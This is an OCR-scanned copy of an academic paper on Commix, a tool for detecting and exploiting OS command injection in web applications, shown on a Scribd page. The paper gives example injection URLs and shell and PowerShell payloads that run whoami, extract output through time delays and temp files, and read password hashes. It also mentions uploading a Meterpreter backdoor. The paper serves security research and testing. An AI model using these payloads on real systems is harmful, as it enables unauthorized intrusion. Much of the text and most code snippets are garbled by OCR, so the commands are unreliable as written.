Scribd
Upload
151 views

Stasinopoulos - Commix Shell Injection - Os Command Injection

yfugih

Uploaded by

Ganesh Kumaar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
151 views

Stasinopoulos - Commix Shell Injection - Os Command Injection

yfugih

Uploaded by

Ganesh Kumaar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
You are on page 1/ 24
International Journal Information Security hepsoiorg/0.1007/s10207-018-0399-2 REGULAR CONTRIBUTION @=« Commix: automating evaluation and exploitation of command injection vulnerabilities in Web applications Anastasios Stasinopoulos’ - Christoforos Ntantogian’ - Christos Xenakis! © Springer-Verlag GmbH Germany, pat of Springer Nature 2018 Abstract Despite the prevalence and the high impact of command injection attacks, litte attention has been given by the research ‘community to this type of code injections. Although there are many software tools to detect and exploit other types of code injections, such as SQL injections or cross-site scripting, there is no dedicated and specialized software that detects and exploits. automatically, command injection vulnerabilities. This paper proposes an open-source tool that automates the process of detecting and exploiting command injection flaws on Web applications, named as COMMand Injection eXploiter (Commix). ‘We present and elaborate on the software architecture and detection engine of Commix as well its extra functionalities that greatly facilitate penetration testers and security researchers in the detection and exploitation of command injection vulnerabilities, Moreover, based on the knowledge and the practical experience gained from the development of Commix, we propose and analyze new identified techniques that perform side-channel exploitation for command injections allowing an attacker to indirectly deduce the output of the executed command (i.., also known as blind command injections). Furthermore, ‘we evaluate the detection capabilities of Commix, by performing experiments against various applications. The experimental results show that Commix presents high detection accuracy, while at the same time false positives are eliminated. Finally and more importantly, we analyze several 0-day command injection vulnerabilities that Commix detected in real-world applications. Despite its short release time, Commix has been embraced by the security community and comes preinstalled in many security-oriented operating systems including the well-known Kali Linux. Keywords Command injection - Code injection - Exploitation - Software tool - Web security 1 Introduction Code injection is a general term for attacks that consist of injecting code, which is consequently executed by a vulnera- ble application, This type of attacks is considered as a major security threat which in facts classified as No. 1 on the 2013, OWASP top ten Web security risks [1]. A code injection vulnerability exploits poor handling of untrusted data and allows an attacker to insert arbitrary code (or commands) into the application, resulting in an unplanned execution 1B Christoforos Nantogian dadoyan@unipi gr Anastasios Stssinopoulos stasinopotloe usp gr (Christos Xenakis sxenakis uni gr ‘Department of Digital Systems, Univesity of Pitseus, Kaaol ‘& Dimirion St. 0, 185 4 Piraeus, Greece Published online: 01 February 2018 behavior. There are many types of code injections attacks including command injections, SQL injections [2], cross- site scripting [3], XPath injections [4] and LDAP injections [5]. In this paper, we will exclusively deal with command injection attacks and we will refer to them as “command injections", They are also named in the literature as "shell ‘command injections” or “operating system command injec- tions” because this type of attack occurs when the application invokes the OS shell (shell commands on Unix-based sys- tems, command prompt shell on Windows) [6]. ‘Command injections may occurin applications that accept user provided input and execute OS commands using as parameters the received input. They have been discovered in ‘Web applications hosted in Web servers (Windows or Linux) as well as in the Web-based management interface of net- ‘working devices, such as home/ofiice routers, IP cameras, IP PBX applications and network printers, Moreover, command injection vulnerabilities can be found in Internet of Things (oT) devices, As a matter of fact, while other types of code D springer A. Stasinopoules tal injection are not relevant in IoT, such as SQL injections, since these devices typically do not include a database, command injections can be discovered in IoT, ifthe latter interact and receive input through a Web application. This is due to the fact that typically IoT devices run an embedded OS (i.e typically Linux), thus they may execute system commands (7-91 (Compared to other code injection attacks such as XSS and SQL injection, command injections may not be so prevalent. However, the security consequences of command injections ‘can be significant and costly. In particular, the impact of ‘command injection attacks ranges from loss of data con- fidentiality and integrity to unauthorized remote access to the system that hosts the vulnerable application, That is, an attacker can gain access to resources that it does not have privileges to directly accessing them, such as system files that include sensitive data (e.g., passwords). More- ‘over, an attacker can perform various malicious actions to the vulnerable system, such as delete files or add new system users for remote access and persistence. A prime ‘example of a real, infamous command injection vulnera- bility that clearly depicts the threats of this type of attacks was the recently discovered (ie., disclosed in 2014) Shell- shock bug [10]. The latter was a high profile vulnerability that could potentially compromise millions of unpatched servers, routers, IoT devices and, in general, any system ‘connected to the Internet [1]. Attackers actively exploited Shellshock by creating botnets of compromised comput- ‘ers and systems to perform distributed denial-of-service attacks, phishing campaigns and vulnerability scanning [11] Apart from Shellshock, in the past, many well-known and widely deployed Web applications have been discovered to be vulnerable fo command injection attacks, including Citrix Access Gateway [12], Symantec Web Gateway [13], IBM Tealeaf CX [14] and Sophos Web Protection Appliance 1s} ‘The above observations are clear indications that com- ‘mand injections are one of the most dangerous class of code injection attacks that can be found nearly in all network devices, which handle input data. Despite the prevalence and the high impact of command injections, lite attention has ‘been given by the research community to this type of attacks, In particular, we have observed that there are many software tools to detect and exploit other types of code injections vul- nerabilities such as SQL injections (ie., sqlmap, SQLninja, etc) or eross-site scripting (i.e, OWASP Xenotix XSS Exploit Framework, XSSer, etc). However, to the best of our knowl- ‘edge, there is no specialized tool to automate the process of detecting and exploiting command injection vulnerabi ties. ‘This paper attempts to fill this gap by proposing an open- source tool that automates the process of detecting and exploiting command injection flaws in Web applications, D Springer named as COMMand Injection eXploiter (Commix), More specifically, first we define and analyze command injec- tions based on practical code examples and present various attack vectors of this vulnerability. Next, we analyze new identified techniques that perform side-channel exploitation for command injections allowing an attacker to indirectly deduce the output of the executed command (ie., also known as blind command injections). Moreover, we present and analyze the software architecture and detection engine of ‘Commix as well its extra functionalities that greatly facilitate penetration testers and security researchers in the detection and exploitation of command injection vulnerabilities. We evaluate the detection capabilities of Commix by perform- ing experiments in several applications. The experimental results show that Commix presents high detection accu- racy, while at the same time false positives are minimized, Compared to the other similar tools, Commix has better detection and exploitation capabilites. Finally, and more importantly, we analyze several 0-day command injection vulnerabilities that Commix detected in real-world applica- tions. Summarizing, the overall contributions of this paper are fourfold: 1. We systematically define, categorize, and analyze in depth command injections with practical examples to ‘gain better understanding ofthis type of eode injections. We elaborate on blind command injection attacks and pinpoint anew, un-documented technique for blind com- mand injections 3. We present, analyze and evaluate our proposed tool ((e., Commix) forautomatically detecting and exploiting command injection vulnerabilities. We show that Com- mix is able to detect, with high success rate, whether 2 Web application is vulnerable to command injection attacks. 4, Basedon Commix, wehave conducted a series of security audits and discovered 0-day command injection vulner abilities in several applications that handle input data in ‘The test of the paper is organized as follows. Section 2 outlines the related work. Section 3 introduces the legacy command injections attacks, while Sect. 4 elaborates on blind command injections using PHP as the server-side pro- ‘gramming language. Section 5 analyzes classic and blind ‘command injections using ASPNET. Section 6 presents and analyzes the software architecture of Commix as well as highlights its advantageous characteristics, Section 7 eval- uuates Commix and explores the discovered 0-day command injections. Section 8 proposes countermeasures that devel- ‘opers should implement in order to protect applications from command injection attacks and finally, Sect. 9 contains the conclusions. Commi automating evaluation and exploitation of command injection vulnerabilities in Web, 2 Related work ‘The related work in command injection attacks is rather lim- ited, due to the fact that the majority of past solutions focus ‘mainly on SQL injections and cross-site scripting vulnera- bilities. Here, we present a set of past works that propose tigation techniques forall types of code injection attacks, including command injections. In [16], the authors present 1 (ool named PHP Aspis that applies runtime taint tracking to secure Web applications written in PHP from all types of ‘code injection attacks, In particular, PHP Aspis transforms the source code by adding metadata to dangerous functions and variables, in order to wack and sanitize input data dus- ing the execution of the application, To reduce performance overheads, PHP Aspis performs partial taint racking only to functions that are more possible to have vulnerabilities. The authors have also evaluated PHP Aspis against third plogins ‘of Wordpress. The numerical results showed high detection rate, while the performance overhead was doubled (ic, by a factor of 2.2), compared to a Wordpress installation that does rot apply taint tracking. The negative aspects of PHP Aspis are related to the fact that by applying partial taint track- ing, there is the possibility to miss several vulnerable parts of the application. Moreover, the scope of the evaluation is limited, since the authors only focus on third-party plugins ‘of Wordpress. Finally, the performance overhead is still not acceptable for real-world deployment in a generic manner. ‘Martin Bravenboer et al. in their work [17] present a pro- ‘gramming approach that embeds the grammars of the guest Tanguages (c.g. SQL) into that of the host language (€.g. Java). In this way, it reconstructs the code of the underlying system using escape functions where appropriate, in order to prevent various types of code injection attacks, such as SQL injection and command injection. As the authors mention, the proposed approach is generic in the sense that it can be applied in any programming language. However, since there is no evaluation of the proposed technique, its effectiveness is not proved. ‘Toward this direction, in [18] the authors have observed that a prerequisite for a code injection attack to succeed lies to the fact that the input that gets propagated into the database {query or tae output document must change the intended syn- tactic structure of the query or document, To this end, they propose an algorithm to prevent code injection attacks based ‘on context-free grammars and compiler parsing techniques, ‘The authors have also implemented a tool to evaluate the effectiveness of their algorithm. The downside of [18] is that the tool detects only SQL. injections vulnerabilities and therefore, there is no evaluation of the proposed algorithm regarding command injection attacks. [19] proposes a security gateway, which is deployed in front of the application server and can automatically produce proper input validation o filter and, eventually, prevent code injection attacks. To verify the efficiency of this mechanism, the authors have evaluated it against vulnerable Web appli- cations, Numerical results showed that itis able to prevent code injections attacks in an efficient manner. However, its practical deployment requires modifications in the existing infrastructure, since an additional security gateway should be placed in front of Web applications. Moreover, in [20] a method named context-sensiive tring evaluation (CSSE) is proposed for defending against injec- tion attacks, More specifically, CSSE works by an automatic marking ofall useroriginated data with metadata about its origin and ensuring that these metadata are preserved and updated when operations are performed on the data. An advantageous characteristic of CSSE is that itdoes notrequire developer interaction or application source code modifi: tions. Furthermore, a prototype implementation of CSSE for the PHP language has been developed for the evaluation of the proposed approach against SQL injection attacks in phpBB platform, The experimental results showed that CSSE prevented all SQL injections attacks. However, the authors have not evaluated the proposed approach against command injections attacks. Finally, itis important to mention that apart from the above papers, there are several technical reports provided by OWASP [21], which include methodologies for ‘manual testing of applications against command injection ‘vulnerabilities. However, these methodologies are not time- effective, and therefore, they have limited practical value, since they are all based on manual (and not automated) test- ing. To the best of our knowledge, there is no dedicated and specialized tool that detects and exploits automatically ‘command injection attacks. We have only discovered some custom scripts [22] that have been writen occasionally by researchers, in order to exploit only a specific vulnerable version of a particular application. Thus, these scripts cannot bbe considered as generic tools for command injection dete tion and exploitation. Moreover, there is a large number of, automated tools (both commercial and open-source) called Web Application Valnerability Scanners, aiming at detect- ing security vulnerabilities, such as OS command injection, cross-site scripting, SQL injection, directory traversal and insecure server configuration. A prominent open-source Web Application Vulnerability Scanner is Arachni, while commercial scanners are NetSparker and Acunetix WVS. Although these scanners may detect OS command injec- tions, none of them offer the ability for automating the exploitation procedure, Note that the term command injec- tion exploitation refers tothe ability of a tool to execute an arbitrary command using an interactive or non-interactive shell. An open-source tool that offers both detection and exploitation of command injections is W3af (we evaluate the detection and exploitation capabilities of these tools with, ‘Commix in Sect. 7.2). In general, all the above tools follow D springer A. Stasinopoules tal a one-size-fits-all approach, aiming at detecting all kinds of ‘vulnerabilities and they do not focus in depth on one-specitic vulnerability. On the other hand, Commixisaspecializedtool for command injection detection and exploitation, Apart from Web Application Vulnerability Scanners, there are also Source Code Analyzers, which detect vulnerabilities bby auditing the source code of the application. For exam- ple, a toot named WAP [65] audits the source code of PHP applications using taint analysis (o detect and correct input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted by entry points and to verify if they reach some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm if the vulnerabilities ate real or false positives. At the end, the real vulnerabilities are cor- rected with the insertion of the fixes (small pieces of code) in the source code. The main limitation of WAP and static analyzers in general is that the source code of the Web appli- cation may not be always available for auditing. 3 Result-based comman: \jections ‘Command injection vulnerabilities may be present in appli: ‘cations that accept and process system commands or system ‘command arguments from users, without proper input valida- tion and filtering. The purpose of a command injection attack is the insertion of an OS command through data input to the vulnerable application, which in tur executes the injected ‘command (see Fig. 1). Itis worth noting that command injec- tion attacks are OS-independent and can occur in Windows, Linux, or Unix OS. They ate also programming language- independent, which means that may occur in applications ‘written in various programming languages and frameworks (such as C/C++, C#, PHP, ASPNET, CGI, Perl, Python). In this section as well as in Sect. 4, we analyze command injec- tion using PHP as the server-side programming language and Linux as the OS, while in Sect. 5, we will analyze command injections using ASP.NET and Windows as the OS, ‘Command injection can be classified into two main cat- ‘egories: a) result-based command injection and b) blind ‘command injection. In the former category, the attacker can directly infer if his/her command injection succeeded o: not and what exactly was the output of the executed command, simply, by reading the response ofthe vulnerable application, ‘The second category of command injections, which has not been studied extensively in the literature, is known as blind ‘command injections. In this category, the vulnerable applica- tion does not output the results of the injected command, in ‘contrast to result-based command injection, where the vul- nerable application ousputs the results. This means that the attacker cannot directly infer ifthe command injection suc- ceeded or not and obtain the results, simply, by reading the D Springer Input is 3 come Inpat achding an arbitrary command) * aooeeee———rerv ‘The application executes a ‘Output @ Fig.1 Command injection tacks response of the Web application. In the rest of this section, ‘we will focus on result-based command injections and their exploitation techniques, while blind command injections are elaborated on Sect. 4. We can further divide result-based command injection attacks into two sub-types: (i) classic result-hased command injection, and, (i) dynamic code eval- uation. In the following, we analyze these two sub-types using code snippets. Itis worth mentioning thatthe presented examples are not realistic Web applications; instead, the aim of the code snippets is to facilitate the better understanding of the presented notions. 3.1 Classic result-based command injection ‘The classic result-based technique is the simplest and most common command injection attack. The attacker makes use of several common Linux shell operators, which either con- catenate the initial genuine commands with the injected ones, or exclude the initial genuine commands executing only the injected ones. These operators are: (i) redirection operators (ie. “<' >>", “>") that allow the attacker to redirect command input or output; (i) pipe operator tie. |") that allows the attacker to chain multiple commands, in order to redirect the ‘output of one command into the next one (ie. in this way the attacker can execute unlimited commands by chaining them with multiple pipes); (ii) semicolon operator (";") that allows the attacker to chain in one code line a sequence of ‘multiple arbitrary OS commands separated by semicolons; (iv) logical operators (e., “&&”, “||") that perform some Commi automating evaluation and exploitation of command injection vulnerabilities in Web, Table 1 Linu shell operators used in command injection attacks ‘Operators Category ‘Symbol Redicecion ! Pipe r Chain commands “ Logical ke," ‘Command substitution “0” New line feed va Oa ” operator, in order to save the output of the command to a text file, Due to the logic of this technique, the file-based can be also classified as semiblind command injection, asthe random text file con- taining the results of the desited shell command execution is visible to everyone. In particular, the attacker can send the {following HTTP GET request to the vulnerable Web applica- tion, presented in Sect. 4.1 (.e., the Web application shown in Fig. 4), beep: //vuin.web. app/blind. php ?addr 227.0.0.17$(whoami)> Uvi: D Springer ‘ommand The above example will execute the “whoami and the output will be saved in a file named “UVILSESS txt inside the “var/www” directory. Again, there are some alter- native attack vectors such as: pete ://vula 127.0.9 27.0.0 27.0.0 web. app/ blind. php?adar Lees (whoani}> UVILSE5S.txt web. epp/ blind. php? addr i] $(whoami)> UVILSESS. ext web. app/blind. php?aady 21s OVILSESS. txt Next, the attacker can trivially read the newly ereated file “UVILSESS.xt” as follows: he ae ani} > he /yuln.web.app/UVILSESS. txt An essential prerequisite to achieve this technique is that the root directory on the Web server (ie., “/var/www/") should be writable by the user that is running the Web server (ie., “www-data"). In case the root directory on the Web server is not writable, then the attacker can use the following technique. 4.3 Tempfile-based semiblind technique Tn order to fully understand the tempfile-hased semiblind injection technique, we assume the following scenario: An attacker is facing a situation where a Web application is vulnerable to blind command injection attacks (after the exe- caution of the injected command, no result returns back to the attacker), but the root directory of the Web server (i.e, ‘varhwww/") is not writable. As we mentioned above, the vwritability and/or accessibility of the Web server's root direc- tory is the most important factor for the success or failure of the “file-based” semiblind technique. Here, we propose an alternative solution by taking advantage of directories that include temporary files (i, suchas “tmp” or “/vat/tmp”) that can store the output of the injected command. We note that these directories, which hold temporary files, ate preinstalled in most OS (Unix, Linux, Windows ete) and they are writable for every user ofthe system. Its also worth noting that in a classic command injection vulnerability, an attacker can read files located in temporary directories through the Web appli- cation, but in a blind command injection vulnerability the attacker is not able to retrieve the result, back to the screen because ofthe nature of vulnerability (blind), despite the fact that he/she is able to ead the files located in these temporary directories (proper permissions are provided). Therefore. in order to bypass this aforementioned limitation, we designed and implemented a new and un-documented technique that applies the pre-referred time-based blind command injection technique in combination withthe file-based semiblind, in a ‘way thatthe contents are extracted out of the text file located. in these temporary directories. For example, the attacker can store the output of the “whoami” command in a random file Commi automating evaluation and exploitation of command injection vulnerabilities in Web, Ge. “hmp/ 'S.Axt") and subsequently deduce how many characters there are in this file, using time delays (see Sect. 4.1), as presented in the following URL: http: //vain.web.app/blind. php?adar= 227.0.0.1; str=$(whoani>'/tmp/ GVILSESS. txt’); str=s(eat */tmp/ GVILSESS. txt"); striss(estr); if [ tin sae $(gtri) J; then sleep 0; ae sleep 1; 5 Command injections in ASP.NET and Windows OS Apart from PHP, there ate also two other widely used server- side languages named JSP and ASP. The former is used zmainly in enterprise applications that incorporate the JAVA stack, while the latter is used mainly in Windows applica- tions thatuse NET framework languages, such as C#. As we analyze inthis section, command injections can be exploited in ASPNET applications in a similar manner as in PHP. On the other hand, in JSP applications, command injections are rare and dificult to exploit. This happens because JSP use the JAVA method named Runtime getRuntime exec) to execute system commands. This method executes system command without invoking a shell and therefore several shell metachar- acters for Linux systems, suchas S,<, >, are notinterpreted as special characters. Moreover, this method has several over- loaded versions that tokenize the command andits arguments sothey are reatedinthe context of asingle command, making the exploitation of a command injection challenging. Apart from the above technical issues, system command execution in JSP isnot widely used, to avoid losing platform portability that JAVA inherently offers, For all the above reasons, com ‘mand injections in JSP are rare and they are exploitable in very few eases as described in [68 Inthe following, we present how command injections can bee detected and exploited in ASP.NET running in a Wine dows OS. In Windows OS, the command line interpreter is the command prompt (ic., cmd.exe). Moreover, an ASPNET application can execute system commands using the Pro- cess Star) method of C# language. Assume the following ‘Web application named blind aspx (see Fig. 8), which isthe ASPNET equivalent code of the PHP code snippet showed inFig. 2. Similarly to the code snippet of Fig. 2, this ASPNET code takes asinputan IP address through the “addr” parameterand, subsequently, executes ping command over the provided BP address, The above code is vulnerable to classic result: ‘based command injection In particular, the attacker can use the “A” operator to chain in one code line a sequence of multiple azbitrary OS commands. Thus, an attacker can use Fig.8 Code snippet of “classic aspx” le Table2. Windows command prompt operators for command injection tacks ‘Operators Category Symbol Redirection Steet! Pipe “Pr Chain commands ra Logical eee ‘Command subtitation No direct equivalent New line feed No ect equivalent the following URL to execute the “dir” command, which is the equivalent of “Is” command in Linux: hetp://vuln.web. app/classic. aspx? addr 127.0.0.08air Moreover, Table 2 is the equivalent of Table 1 for Windows command prompt operators that can be used in command injections Blind command injections can also occur in ASPNET applications running in a Windows OS. The methodology to detect and exploit them is exactly the same as in a PHP appli- cation running in a Linux OS. Note that in order to perform blind command injection, we take advantage of Powershell, which is more powerful than the command prompt and allows us tocreate complex code structures, More specifically, inthe cease of time-based blind command injection, first the altacker should detect whether the ASPNET application is vulnera- ble to command injections. The following code snippets the ‘equivalent of the code snippet presented in Fig. 5. & for /£ ‘sokens=** i in (om fe write ‘AJTRCL’.length*’} do if 4i D springer A. Stasinopoules tal 6 (end /e ‘powershell.exe - nputFormat none Start-Sleep -2 2") ‘Afterward, the attacker should infer the length of the out- put ofthe provided injected command (ie., “whoami in our example). The following code snippet is the equivalent one of Fig. 6 for determining the length of the injected command. & for /£ ttokens=** i in (vend fe * powersheli.exe -InputFormat none write-host ([string] (cma /e whoant} )etrim().length*') do if $iss6 (end je *powershell.exe -TnputFormat none Start-Sleep -2 3°) Finally, the attacker finds out the output of the injected ‘command (1., “whoami") by reading each character one by ‘one. The following code snippet is the equivalent of Fig. 7 to brute force character-by-character the output of the injected ‘command, & for /f *tokens=** 4i in (vena fe * powershell.exe -InputFornat none write ({int][char]{((string] (end /e Whean)}.tria{}}-substring (0,11)"” yd if tis=100 (cma /e ‘powershell exe -InputFormat none start-Sleep easy Ina similar manner to Linux OS, the file-based semiblind technique can be used to exploit blind command injections in ‘Windows OS. The following code snippet prints out the result of the execution of the “whoami” command into a random filename “DGYPYD.txt” & for /f ‘tokens=** ti in (rena se * powershell.exe -rnputFormat none write-hose (cmd /e ‘whoami}*") do Geet /p -¥i >DGYPYD. texte nul Finally, in a tempfile-based semiblind technique, the attacker can store the output of the “whoami” command in a random file (Le, “Yétemp"\VVKBSV.txt”) and, sub- sequently, read its contents using time delays. That is, the contents of the “%temp%\VVKBSV.xt" file can be read ‘character-by-character using the following code snippet. & for sé *tokens=** i in (vend fe * powershell exe -TnputFornat none ( Get-content seenp#\YVKBSY. ext) splic(' "){0]"") do if tine6s (ond 7@ *powershell .exe ~TnputPornat hone Stare-Sleep = 4") 6 Commix ‘Commis is a software tool aiming at facilitating Web devel- ‘opers, penetration testers and security researchers to test Web applications with the view to find bugs, errors or vulner- abilities related to command injection attacks. The tool is D springer Attack Vector Generator Module : Dynamic Code Sai Evaluation Blind-based | | Fite-based y Vulnerab Detection Module Exploitation Module Fig. 9 High-level architecture of Commix ‘written in Python (version 2.6. or 2.7) and runs in both Unix- based (ie., Linux, Mac OS X) and Windows OS, Commix is free to download through the GitHlub repository [61]. Itis ‘worth mentioning that Commix comes preinstalled in many security-oriented OS including the well-known Kali linux [27], while its capabilities have been presented with a real demo in the BlackHat Europe 2015 security event [63]. 6.1 Software architecture ‘As shown in Fig 9, the general structure ofthe tool is divided {nto three main modules: (i) the atack vector generator, i) the vulnerability detection module, and (ii) the exploita- tion module. The attack vector generator module as its name implies generates a set of command injection attack vectors. ‘The latter are produced from the comman! injection sepa- rators’ list (see Tables 1 and 2) and the type of command injections that willbe performed (.e., classi, dynamic code evaluation, time-based and file-based). In this way, foreach type of attack a set of different attack vectors are generated and passed 0 the vulnerability detection module. ‘The vulnerability detection module attempts to perform the command injections to the target Web application, using the attack vectors received from the attack vector genera- Commi automating evaluation and exploitation of command injection vulnerabilities in Web, tor module. In particular, the vulnerability detection module takes the first attack vector and attempts to inject and exe- ‘cute the echo command. After receiving the response from the application, this module compares whether the results ‘obtained were the same with the ones expected. If they are, ‘then this means that the command was executed successfully ‘otherwise, it proceeds with the next attack vector. This pro- cedure continues until a vulnerability is discovered or when all the atack vectors have been used and no vulnerability has been discovered. It is important {o mention that the module is capable of performing command injection not only in the HTTP GET/POST parameter, but also in HTTP parameters, such ag HTTP cookie, HTTP user-agent and referer header values. If the vulnerability detection module determined that the application is vulnerable, then Commix triggers the exploita- tion module to attempt automatic exploitation. In particular, the exploitation module uses the same attack vector, which the vulnerability detection module succeeded in performing the command injection, to exploit the application. Note that the specific command that the exploitation module will exe- ‘cute is user-supplied. Ifthe exploitation of the vulnerability is successful, then the execution results will be displayed to the user. It is important to mention that the exploitation module provides also an integration interface with the Metas- ploit exploitation framework, in order to perform automatic exploitation and obtain a remote shell with the target system during penetration testing scenarios. 6.2 Reducing false positives ‘To reduce false alarms, the vulnerability detection module of ‘Commix makes use of special heuristics, which minimize the ‘occurrence of false alarms. To analyze how these heuristics ‘operate, first we need to understand how false alarms occur, ‘More specifically, we have observed several cases where the result ofacommand injection attemptis similar to what Com- mix expects to receive (ie, the output of the command), without, however, the injected command actually being exe- ‘cuted. For instance, when the vulnerability detection module attempts to perform injection of the command echo NTAVG Ge., prin the random string NTAVG) to find out whether or not there is a vulnerability in a Web application, we have ‘observed that some Web applications print back the ran- dom string (1... NTAVG), without, however, executing the injected command echo NTAVG, Thus, Commix erroneously ‘considers that these applications are vulnerable to command injections, increasing in this way false positives, To address this issue and reduce false positives, Commix makes use of heutistics, in order to decide whether an application is vul- nerable to command injection attacks, More specifically, the vulnerability detection module tries to inject commands that print the result of mathematic calculations to ensure that the application has executed the injected command. For instance, in order to decide whether an application is vulnerable to result-based command injection flaws, Commix will ty to ‘echo three times a randomly generated five-character string (ie, NTAVG) concatenated with the result of a mathematic calculation of two randomly selected numbers (ie., 28+50), echo NTAVGS ((28+50))$ (echo NravG) NrAVG If this command is executed properly, the Web appli- cation should output the string NTAVG78NTAVGNTAVG, which contains the concatenation of the randomly gener- ated five-character string (e.g., NTAVG) with the result of the mathematic calculation (e.g., 28450). Based on the above heuristic, Commix guarantees thatthe response is pro- duced by the execution of a specific command, climinating false positives, Moreover, false positives can also occur in ‘time-based blind command injections. To address this issue, Commix performs a time-based false positive check, More specifically, this time-based false positive check first caleu- lates the average response time of the target host. Next, the calculated average response time is added tothe default delay time, whichis used to pesform the time-based blind command injections. Finally, itis important to mention that Commix, being 4 free and open-source tool, allows security researchers to extensively test it in order to detect bugs and errors. In this ‘way, a number of false positives, especially in time-based and tempfile-based command injections, were reported and fixed. 6.3 Other functionality Commix supports a plethora of functionalities, in order to cover several exploitation scenarios, These functionalities sare: (1) Various HTTP protocol authentication mechanisms (ez. Basic’ or ‘Digest’), (2) provision of custom Cookies and/or other HTTP headers, (3) support of HTTP proxies, (@) use of the Tor network, (5) user-supplied prefixes and safixes, (6) alternative OS shell (python), (7) host and Web application enumeration, (8) read or write files at the tar get host, (9) resume of scanning, (10) support for importing custom modules More specifically, some command injection vulnerabili- ties may only be exploitable vin authenticated users (c.g ADSL routers, IP cameras or other embedded devices). For this reason, Commix supports various HTTP protocol authentication mechanisms, where the user ean provide valid credentials to authentication tothe Web application Basic’ HTTP protocol is supported). Is also possible, a Web appli- cation to requize authentication based upon cookies. To this end, Comix enables the user to alter and provide his/her own HTTP Cookie header values. D springer A. Stasinopoules tal Se) (0 (preg maven /-VAC (1,3). Aa 38/0" 3).\aC1 3} Ad soeTEip'1)))€ die (*Tavaiia IP address"); y aysten ("ping -e 2 ".$ GETE?sp!])5 Fig. 10. The “ip” parameter is veiied using a regular expression It is also worth noting that Commix allows the user to provide his/her own HTTP referer header value, HTTP user agent header, as well as extra HTTP headers, For instance, by default Commix performs HTTP requests using a specific user-agent header “Commix/v0.4b-xxxxxxxx". However, it is possible to change it either by providing a user-supplied ‘one or a randomly generated one. Moreover, in many cases there is a need for a user to modify HTTP requests created by the Commix, before they are sent tothe Web application, as well as to modify responses retumed from the applica- tion, before they are received by the Commix. To achieve this, Commix supports the use of HTTP proxies (.g., Burp- Suite, etc). Rather than manually providing a single target host or possible injection points, Commix is able to eval- vate and exploit (if they prove to be exploitable) HTTP requests proxied and provided through BurpSuite or Web- Scarab proxy. This option requires as an argument the HTTP proxy's requests log file. In addition, Comix supports the ‘execution of command injections through the Tor network for anonymity purposes [26] Another provided functionality of Commix is the capa- bility to insert users own suffixes and prefixes. In some circumstances, the vulnerable parameter is exploitable, only ifthe user provides a specific prefixin the injection attack vec- tor. To be more specific, consider the code snippet of Fig. 10. ‘The GET parameter “ip” is verified using the ‘preg_match()” function, In particular, it is checked whether the “ip” param- ‘ter starts with an IP address. If yes, then the ping command is executed using the “ip” parameter as an argument, Othet- wise, the application prints an error message. For this reason, avalid IP address should be inserted as prefix atthe beginning of the attack vector, followed by the injection command. For ‘example, the attack vector “192. 168.2.1%0als” will success- fully pass the “‘preg_match(” verification and subsequently ‘execute the injected “Is” command. Based on the same logic, an IP address (or any other string) can be inserted atthe end of the atack vector, as a sufix, Furthermore, during the development and testing of Com- mix, we encountered systems that include a limited set of Linux shell commands (.e., “eat”, “echo” ete.) As a result, several attack vectors of Commix filed, because the included Linux shell commands were not available in the target sys- tem. To overcome this issue, Commix supports a set of alternative attack vectors, which are produced from a pro- D Springer ‘gramming language and not from the underlying OS shell commands. Evidently, the specific programming language that the alternative attack vectors are based on should be preinstalled on the target system. At the time of writing, ‘Commix supports only the Python programming language to create alternative attack vectors. In the next versions of ‘Commis, alternative attack vectors based on PHP, Perl and Ruby languages will be also included, Another important functionality of Commix has to do with the fact that during penetration (esting scenarios, there are several eases where We want to take actions, such as system ‘and user enumeration in an easy and quick manner, with- ‘out dealing with complex bash system commands, For this reason, Comimix supports several “enumeration” options, To bbe more specific, a user can retrieve the current user name ‘and check if he/she has root privileges. It is also possible to retrieve the hostname, the OS and the system architec. ture. Moreover, itis possible to enumerate system usernames, users privileges, and users password hashes (i.¢., by access- ing the “etc/shadow” file if itis readable by the current user), ‘Commix also allows users to read, write or upload files auto- ‘matically (o the target system, by selecting the “file access ‘options, These options can be used for example to upload a backdoor (ie., “Meterpreter”) on the target host. Another functionality of Commixis the ability torecordall successful injection points into a session file (Le. an sqlite3 database), regardless of the injection technique being used against the target host. Through that option, a user can easily save and resume scan results at the exact point where the execution of Commix stopped. This option is very useful for resuming injection attacks on the same target, eliminating the need {o start the attacks from the beginning. Finally, another advantageous feature that makes Commix aquite powerful tool is that itis designed to be modular. This ‘means that it allows a user to write and import its own python ‘modules, in order to perform whatever task he/she desires, At the time of writing, Commix comes with two python mod- ules. The first one, which is named as “icmp_exfiltration py’ supports the ICMP exfiltration technique, which extiltrates data from the system using the “ping” command [28], [29], ‘The other module, which is named as “shellshock py”, can ‘check the target host against the Shellshock vulnerability and then perform an automated exploitation. 7 Evaluation In this section, we evaluate the detection and exploitation capabilities of Commix. To this end, we have performed three different set of experiments. In the frst set of exper- iments, we have evaluated Commix against applications that ‘are deliberately vulnerable. That is, the command injection vulnerabilities of these applications are known a priori, and Commi automating evaluation and exploitation of command injection vulnerabilities in Web, we test Commix whether it will detect them. In the sec- ond set of experiments, we have compared the detection and exploitation capabilities of Commix with other tools. In the third set of experiments, we have evaluated Com- ‘mix against real-world applications to detect 0-day command injection vulnerabilities (.e., vulnerabilities which have not been reported before), Inall experiments, we have used PHP as the server-side language for the Web applications for the following reasons () PHP is a popular programming language for server-side ‘Web applications and used by various CMS (¢.g., Wordpress, Drupal, etc.) (ii) it is free and easy to setup a develop- ‘ment environment and (ii) there are several open-source PHP projects available in public repositories that we can perform a security assessment, In all the following examples as well as in the experiments, we have considered a typical Web server setup with Linux as the underlying OS, and speci cally a Debian distribution that uses Bash asthe default shell ‘The only exception in the above setup was in the second set of experiments where we used also a Windows 2003 server R2 to evaluate two ASPNET vulnerable applications (see Sect, 7.2) 7.1 First set of experiments: virtual lab applications ‘Toperform the frst set of experiments, wehave collected aset of free, open-source, Web applications that are vulnerable to ‘command injections. These vulnerable Web applications are also called virtual lab applications, because their main goal is to provide a safe and legal environment for developers to understand and Jeam Web application security, as well as facilitate security professionals o test the effectiveness of their own tools. Table 3 presents the results of the first set of experiments, In particular, it depicts the virtual Ieb applications, the filename that included the vulnerability and, finally the type of command injection that Commix achieved to deteot and exploit. In many cases, the vulnerabilities in ‘command injection attacks may correspond to more than one technique, meaning that vulnerability can be exploited using zmore than one exploitation methods Damn Vulnerable Web App 